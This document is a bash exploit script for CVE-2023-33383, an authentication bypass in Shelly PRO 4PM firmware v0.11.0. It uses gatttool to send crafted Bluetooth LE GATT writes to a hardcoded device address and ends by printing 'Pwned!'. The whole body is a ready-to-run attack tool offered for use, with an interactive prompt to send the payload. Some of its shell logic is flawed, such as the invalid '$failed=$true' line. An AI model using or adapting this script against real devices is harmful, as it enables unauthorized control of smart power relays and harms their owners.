#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"
banner()
{
clear
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
echo -e "${GREEN}| CVE: CVE-2023-33383 |"
echo -e "${GREEN}[+]*********************************************************[+]"
echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}
banner
read -s -n 1 key
if [ "$key" = "x" ]; then
exit 0;
elif [ "$key" = "" ]; then
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
exit 0;
fi
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
if [ $? -eq 1 ]; then
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fi